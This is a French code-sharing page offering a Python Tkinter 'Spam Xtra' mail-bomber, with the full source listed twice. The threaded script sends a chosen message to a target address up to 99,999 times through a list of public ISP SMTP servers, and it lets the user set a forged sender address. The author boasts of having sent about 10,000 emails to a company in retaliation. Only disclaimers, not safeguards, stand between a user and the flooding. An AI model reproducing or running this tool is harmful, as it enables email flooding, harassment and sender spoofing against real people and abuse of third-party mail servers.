Trouver une ressource (Nouvelle version du moteur, plus rapide & pertinent, essayez le !)
Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum.
Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !
SPAMMEUR
Description
BAS IL SERT A SPAMER LES SPAMEURS ... JE L'AI UTILISER (ct une boite qui m'envoyer 10mail par jour) JE LEUR AI ENVOYER PRES DE 10000 MAIL DISANT : STOP THIS ILLEGAL SPAM !!! Otherwise I SPAM YOU !!! ET ILS ONT ARRéTéS ^^. CE N'EST PEUT-ÊTRE PAS UNE SOLUTION MIRACLE NéANMOIN CA PEUT MARCHER ^^
Source
- from Tkinter import *
- from tkMessageBox import *
- import smtplib
- import time
- from threading import Thread
- try :
- import Pmw
- except :#Si vous n'avez pas Pmw, cette partie s'executera.
- def spam () :
- global from_addr, to_addrs, msg
- if askyesno("Attention !", "CETTE ACTION PEUT-ETRE ILLEGALE\n\n\nMOI XEOLIN NE SUIS PAS RESPONCEBLE DE VOS AGISSEMENT AVEC CE LOGICIEL.\n\nDE PLUS JE VOUS RAPELLE QUE CE LOGICIEL EST GRATUIT ET NON LIBRE\n\nVOULEZ-VOUS CONTINUER ?") ==True :
- from_addr = who.get()
- to_addrs = [who.get()]
- date = time.ctime(time.time())
- msg = """From: "HUNTER OF SPAMMER - HUNTER OF HACKER" <HOV_HOH@hotmail.com>
- Subject: SPAMING
- Date: %s
- To: "THE SPAMEUR" <None@hotmail.com>
-
- STOP THIS ILLEGAL SPAM !!!
- OTHERWISE I SPAM YOU !!!
-
- """ % date
- for a in range(0,int(num.get())):
- starter().start()
-
- class starter(Thread):
- def __init__ (self):
- Thread.__init__(self)
-
-
- def run(self):
- s = smtplib.SMTP('smtp.wanadoo.fr')#smtp.free.fr
- s.sendmail(from_addr, to_addrs, msg)
- s.quit()
-
-
- def run () :
- try :
- nombre = int(num.get())*0.2
- except :
- nump.configure(text='temps estime : FORMAT INVALIBLE')
- else :
- mnombre=nombre/60
- mnombre-=mnombre%1
- nombre-=mnombre*60
- hnombre=mnombre/60
- hnombre-=hnombre%1
- mnombre-=hnombre*60
- nump.configure(text='temps estime : %s heures %s minutes %s secondes'%(int(hnombre),int(mnombre),nombre))
- root.after(1000,run)
-
-
- root=Tk()
- root.title('Spam Xtra | By Xeolin | version 1.8 (Finie)')
- Label(text='Spamer combien de fois ?',bg='grey0',fg='grey50').grid(row=0,column=0)
- num=Entry(bg='grey50')
- num.grid(row=0,column=1)
- nump=Label(text='temps estime : FORMAT INVALIBLE',bg='grey100')
- nump.grid(row=0,column=2)
- Label(text=' A quelle adresse ? ',bg='grey0',fg='grey50').grid(row=1,column=0)
- who=Entry(bg='grey50')
- who.grid(row=1,column=1)
- Button(text=' SPAMMER ! ',command=spam).grid(row=3,column=1)
- run()
- root.mainloop()
- else : #Si vous avez Pmw, cette partie s'executera.
- stmplist=['smtp.free.fr','smtp.wanadoo.fr','smtp.neuf.fr','smtp.9online.fr','smtp.fr.aol.com','smtp.lycos.co.uk','smtp.cegetel.net','mail.club-internet.fr','smtp.dbmail.com','smtp.evhr.net','smtp.freesurf.fr','smtp.gawab.com','smtp.gmail.com','smtp.ifrance.com','smtp.laposte.net','smtp.magic.fr','smtp.nerim.net','smtp.neuf.fr','smtp.orange.fr','smtp.mail.yahoo.fr']
-
- def spam () :
- global from_addr, to_addrs, msg
- if askyesno("Attention !", "CETTE ACTION PEUT-ETRE ILLEGALE\n\n\nMOI XEOLIN NE SUIS PAS RESPONCEBLE DE VOS AGISSEMENT AVEC CE LOGICIEL.\n\nDE PLUS JE VOUS RAPELLE QUE CE LOGICIEL EST GRATUIT ET NON LIBRE\n\nVOULEZ-VOUS CONTINUER ?") ==True :
- if askyesno("Attention !", "CETTE ACTION PEUT-ETRE ILLEGALE\n\n\nMOI XEOLIN NE SUIS PAS RESPONCEBLE DE VOS AGISSEMENT AVEC CE LOGICIEL.\n\nDE PLUS JE VOUS RAPELLE QUE CE LOGICIEL EST GRATUIT ET NON LIBRE\n\nVOULEZ-VOUS CONTINUER ?") ==True :
- from_addr = who.get()
- to_addrs = [who.get()]
- date = time.ctime(time.time())
- msg = """From: %s
- Subject: SPAMING
- Date: %s
- To: "THE SPAMEUR" <None@hotmail.com>
- \n\n\n\n\n\n\n\n
- %s
-
- """ % (toto.get(),date,opt.get())
- for a in range(0,int(num.get())):
- lanceur().start()
-
-
- class lanceur(Thread):
- def __init__ (self):
- Thread.__init__(self)
-
-
- def run(self):
- try :
- s = smtplib.SMTP(stmp)
- s.sendmail(from_addr, to_addrs, msg)
- s.quit()
- except : pass
-
-
-
- def changestmp (e):
- global stmp
- stmp=e
-
- fen=Tk()
- Pmw.initialise(fen)
- fen.title('Spam Xtra | By Xeolin | version 1.7')
-
- notebook = Pmw.NoteBook(fen)
- notebook.pack(fill = 'both', expand = 1, padx = 10, pady = 10)
- root = notebook.add('general')
- notebook.tab('general').focus_set()
-
-
-
- Label(root,text='Spamer combien de fois ?',bg='grey0',fg='grey50').grid(row=0,column=0)
-
- num = Pmw.Counter(root,
- entry_width = 5,
- entryfield_value = 50,
- entryfield_validate = {'validator' : 'integer',
- 'min' : 1, 'max' : 99999}
- )
- num.grid(row=0,column=1)
- Label(root,text=' A quelle adresse ? ',bg='grey0',fg='grey50').grid(row=1,column=0)
- who=Entry(root,bg='grey50')
- who.grid(row=1,column=1)
- Label(root,text=' Quel stmp ? ',bg='grey0',fg='grey50').grid(row=2,column=0)
- who= Pmw.ComboBox(root,
- selectioncommand = changestmp,
- scrolledlist_items = stmplist,
- )
-
- who.grid(row=2,column=1)
- Button(root,text=' SPAMMER ! ',command=spam).grid(row=4,column=1)
-
- root = notebook.add('option avancees')
- Label(root,text='Message :').pack()
- opt=Text(root,height=2)
- opt.pack()
- opt.insert('0.0','STOP THIS ILLEGAL SPAM !!! \nOTHERWISE I SPAM YOU !!!')
- toto=Entry(root,width=80)
- toto.pack()
- Label(root,text='Adresse de l\'expediteur').pack()
- toto.insert('0','"HUNTER OF SPAMMER - HUNTER OF HACKER" <HOV_HOH@hotmail.com>')
- fen.mainloop()
from Tkinter import *
from tkMessageBox import *
import smtplib
import time
from threading import Thread
try :
import Pmw
except :#Si vous n'avez pas Pmw, cette partie s'executera.
def spam () :
global from_addr, to_addrs, msg
if askyesno("Attention !", "CETTE ACTION PEUT-ETRE ILLEGALE\n\n\nMOI XEOLIN NE SUIS PAS RESPONCEBLE DE VOS AGISSEMENT AVEC CE LOGICIEL.\n\nDE PLUS JE VOUS RAPELLE QUE CE LOGICIEL EST GRATUIT ET NON LIBRE\n\nVOULEZ-VOUS CONTINUER ?") ==True :
from_addr = who.get()
to_addrs = [who.get()]
date = time.ctime(time.time())
msg = """From: "HUNTER OF SPAMMER - HUNTER OF HACKER" <HOV_HOH@hotmail.com>
Subject: SPAMING
Date: %s
To: "THE SPAMEUR" <None@hotmail.com>
STOP THIS ILLEGAL SPAM !!!
OTHERWISE I SPAM YOU !!!
""" % date
for a in range(0,int(num.get())):
starter().start()
class starter(Thread):
def __init__ (self):
Thread.__init__(self)
def run(self):
s = smtplib.SMTP('smtp.wanadoo.fr')#smtp.free.fr
s.sendmail(from_addr, to_addrs, msg)
s.quit()
def run () :
try :
nombre = int(num.get())*0.2
except :
nump.configure(text='temps estime : FORMAT INVALIBLE')
else :
mnombre=nombre/60
mnombre-=mnombre%1
nombre-=mnombre*60
hnombre=mnombre/60
hnombre-=hnombre%1
mnombre-=hnombre*60
nump.configure(text='temps estime : %s heures %s minutes %s secondes'%(int(hnombre),int(mnombre),nombre))
root.after(1000,run)
root=Tk()
root.title('Spam Xtra | By Xeolin | version 1.8 (Finie)')
Label(text='Spamer combien de fois ?',bg='grey0',fg='grey50').grid(row=0,column=0)
num=Entry(bg='grey50')
num.grid(row=0,column=1)
nump=Label(text='temps estime : FORMAT INVALIBLE',bg='grey100')
nump.grid(row=0,column=2)
Label(text=' A quelle adresse ? ',bg='grey0',fg='grey50').grid(row=1,column=0)
who=Entry(bg='grey50')
who.grid(row=1,column=1)
Button(text=' SPAMMER ! ',command=spam).grid(row=3,column=1)
run()
root.mainloop()
else : #Si vous avez Pmw, cette partie s'executera.
stmplist=['smtp.free.fr','smtp.wanadoo.fr','smtp.neuf.fr','smtp.9online.fr','smtp.fr.aol.com','smtp.lycos.co.uk','smtp.cegetel.net','mail.club-internet.fr','smtp.dbmail.com','smtp.evhr.net','smtp.freesurf.fr','smtp.gawab.com','smtp.gmail.com','smtp.ifrance.com','smtp.laposte.net','smtp.magic.fr','smtp.nerim.net','smtp.neuf.fr','smtp.orange.fr','smtp.mail.yahoo.fr']
def spam () :
global from_addr, to_addrs, msg
if askyesno("Attention !", "CETTE ACTION PEUT-ETRE ILLEGALE\n\n\nMOI XEOLIN NE SUIS PAS RESPONCEBLE DE VOS AGISSEMENT AVEC CE LOGICIEL.\n\nDE PLUS JE VOUS RAPELLE QUE CE LOGICIEL EST GRATUIT ET NON LIBRE\n\nVOULEZ-VOUS CONTINUER ?") ==True :
if askyesno("Attention !", "CETTE ACTION PEUT-ETRE ILLEGALE\n\n\nMOI XEOLIN NE SUIS PAS RESPONCEBLE DE VOS AGISSEMENT AVEC CE LOGICIEL.\n\nDE PLUS JE VOUS RAPELLE QUE CE LOGICIEL EST GRATUIT ET NON LIBRE\n\nVOULEZ-VOUS CONTINUER ?") ==True :
from_addr = who.get()
to_addrs = [who.get()]
date = time.ctime(time.time())
msg = """From: %s
Subject: SPAMING
Date: %s
To: "THE SPAMEUR" <None@hotmail.com>
\n\n\n\n\n\n\n\n
%s
""" % (toto.get(),date,opt.get())
for a in range(0,int(num.get())):
lanceur().start()
class lanceur(Thread):
def __init__ (self):
Thread.__init__(self)
def run(self):
try :
s = smtplib.SMTP(stmp)
s.sendmail(from_addr, to_addrs, msg)
s.quit()
except : pass
def changestmp (e):
global stmp
stmp=e
fen=Tk()
Pmw.initialise(fen)
fen.title('Spam Xtra | By Xeolin | version 1.7')
notebook = Pmw.NoteBook(fen)
notebook.pack(fill = 'both', expand = 1, padx = 10, pady = 10)
root = notebook.add('general')
notebook.tab('general').focus_set()
Label(root,text='Spamer combien de fois ?',bg='grey0',fg='grey50').grid(row=0,column=0)
num = Pmw.Counter(root,
entry_width = 5,
entryfield_value = 50,
entryfield_validate = {'validator' : 'integer',
'min' : 1, 'max' : 99999}
)
num.grid(row=0,column=1)
Label(root,text=' A quelle adresse ? ',bg='grey0',fg='grey50').grid(row=1,column=0)
who=Entry(root,bg='grey50')
who.grid(row=1,column=1)
Label(root,text=' Quel stmp ? ',bg='grey0',fg='grey50').grid(row=2,column=0)
who= Pmw.ComboBox(root,
selectioncommand = changestmp,
scrolledlist_items = stmplist,
)
who.grid(row=2,column=1)
Button(root,text=' SPAMMER ! ',command=spam).grid(row=4,column=1)
root = notebook.add('option avancees')
Label(root,text='Message :').pack()
opt=Text(root,height=2)
opt.pack()
opt.insert('0.0','STOP THIS ILLEGAL SPAM !!! \nOTHERWISE I SPAM YOU !!!')
toto=Entry(root,width=80)
toto.pack()
Label(root,text='Adresse de l\'expediteur').pack()
toto.insert('0','"HUNTER OF SPAMMER - HUNTER OF HACKER" <HOV_HOH@hotmail.com>')
fen.mainloop()
Conclusion
Je déconseille l'utilisation de ce programme.
Je conseille d'avoir pmw pour ce script : l'interface est beaucoup plus jolie et complète.
Fichier Zip
Pour les "Membres Club", vous pouvez télécharger directement un fichier contenu dans le zip sans télécharger le zip en entier !
Télécharger le zip
Historique
- 07 juillet 2006 11:53:46 :
- UNE LIGNE DE TROP DSL
- 07 août 2006 20:04:03 :
- ...
- 26 mai 2007 14:33:02 :
- Utilisation des Threads
- 26 mai 2007 15:18:19 :
- Ajout de "notebook", Ajout d'une liste de stmp, Ajout d'une sécuritée du compteur, Ajout de la possibilitée de modifier l'adresse de l'expediteur et de changer le message. Seulement pour les adeptes de Pmw.
Sources de la même categorie
Commentaires
Discussions en rapport avec ce code source
|
CalendriCode
| | | L | M | M | J | V | S | D |
| | 1 | 2 | 3 | 4 | 5 | 6 |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 | | | |
|
Téléchargements
Logiciels à télécharger sur le même thème :
|